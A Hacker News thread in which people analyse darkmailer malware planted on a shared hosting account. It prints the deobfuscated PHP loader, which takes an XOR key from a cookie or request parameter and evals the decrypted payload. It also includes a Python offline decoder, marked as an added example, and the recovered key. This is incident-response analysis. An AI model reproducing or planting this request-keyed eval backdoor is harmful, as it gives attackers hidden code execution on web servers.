
Ask HN: Can you decrypt this evil thing? - noduerme
The back story is, someone got a stolen FTP password to a client's account on a shared server and uploaded this. It's some kind of darkmailer, since I spent the next three days getting that server off blacklists. It doesn't look like the attacker got access outside the account. The account's been cleaned out, but I still don't know what else this might have done. I got one level of deobfuscation in -- that's the easy part -- but it looks like it takes an input string to decrypt what's inside that. There are two parts, one in PHP and the other in perl.

http://pastebin.com/ctswucid

http://pastebin.com/vVjYrikW
======
gulbrandr
The code is obfuscated as ascii characters in the $e variable. It uses the PHP
function 'cor' to 'decrypt' the code (I think the same method is used in
evil.pl).

The PHP code is:

    if (!@isset($_SERVER)) { $_COOKIE = &$HTTP_COOKIE_VARS; $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; }
    // the XOR key is taken from the request: cookie 'key' first, then POST, then GET
    $k = $_COOKIE['key'];
    if (empty($k)) { $k = $_POST['key']; }
    if (empty($k)) { $k = $_GET['key']; }
    // decrypt(): XOR whole key-length blocks against the key, then the trailing
    // partial block against a key prefix of the same length (a repeating-key XOR)
    if (!@function_exists('decrypt')) {
        eval('function decrypt($e,$k){
            if(!$k){return;}
            $el=@strlen($e); $kl=@strlen($k); $rl=$el%$kl; $fl=$el-$rl;
            for($o=0;$o<$fl;$o+=$kl){ $p=@substr($e,$o,$kl); $d.="$k"^"$p"; }
            if($rl){ $p=@substr($e,$fl,$rl); $k=@substr($k,0,$rl); $d.="$k"^"$p"; }
            return($d);
        }');
    }
    $d = @decrypt($d, $k);
    eval($d);

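The XOR routine above, re-implemented in Python as an added example (not code from the thread or from the dropper) so the payload can be decoded offline for analysis instead of being handed to PHP's eval(). The key and payload in the demo are constructed stand-ins, not the values from the pastebins; `looks_like_php` is an added plausibility check for candidate keys.

```python
#!/usr/bin/env python3
"""Offline mirror of the dropper's decrypt($e,$k) routine.

The loader XORs the obfuscated payload against a key supplied in a request
parameter named 'key' (cookie, POST or GET) and evals the result.  Running
the same XOR here recovers the payload without executing attacker code.
"""
import re


def xor_decrypt(e: bytes, k: bytes) -> bytes:
    """Block-for-block mirror of the PHP function: whole key-length blocks are
    XORed against the full key, the trailing partial block against a key
    prefix of equal length.  Net effect is a repeating-key XOR, so the same
    call also re-encodes (XOR is its own inverse)."""
    if not k:
        return b""
    kl, el = len(k), len(e)
    rl = el % kl          # length of the trailing partial block
    fl = el - rl          # bytes covered by whole blocks
    d = bytearray()
    for o in range(0, fl, kl):
        d.extend(a ^ b for a, b in zip(k, e[o:o + kl]))
    if rl:
        d.extend(a ^ b for a, b in zip(k[:rl], e[fl:]))
    return bytes(d)


PHP_MARKERS = re.compile(rb"<\?php|\beval\s*\(|\bmail\s*\(|\$_(GET|POST|COOKIE)\b")


def looks_like_php(plaintext: bytes) -> bool:
    """Plausibility check for a candidate key: the right key yields mostly
    printable text containing PHP constructs; a wrong one yields noise."""
    printable = sum(32 <= c < 127 or c in b"\r\n\t" for c in plaintext)
    ratio = printable / max(len(plaintext), 1)
    return ratio > 0.95 and PHP_MARKERS.search(plaintext) is not None


def demo() -> bool:
    # Constructed sample: a short PHP snippet round-tripped through the XOR
    # with a made-up key (not the key posted in the thread).
    key = b"ExampleKey1"
    payload = b"<?php mail($_POST['to'], 'x', $_POST['body']); ?>"
    encoded = xor_decrypt(payload, key)
    return xor_decrypt(encoded, key) == payload and looks_like_php(payload)


if __name__ == "__main__":
    print("round trip ok" if demo() else "round trip FAILED")
```

Because the key is read from a GET parameter as a fallback, a web server's access log for the affected account may show the key in requests for the dropped file, which is where to look before trying to guess it.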
------
noodly
For the PHP script, the key is:

SjJVkE6rkRYj

and the decrypted evil script is here:

<http://pastebin.com/z53aByWX>

I didn't look at the perl script.

~~~
noodly
And here's the decrypted perl script: <http://pastebin.com/7RDpTXDp>

It does almost the same thing as the PHP script, and uses the same key :P

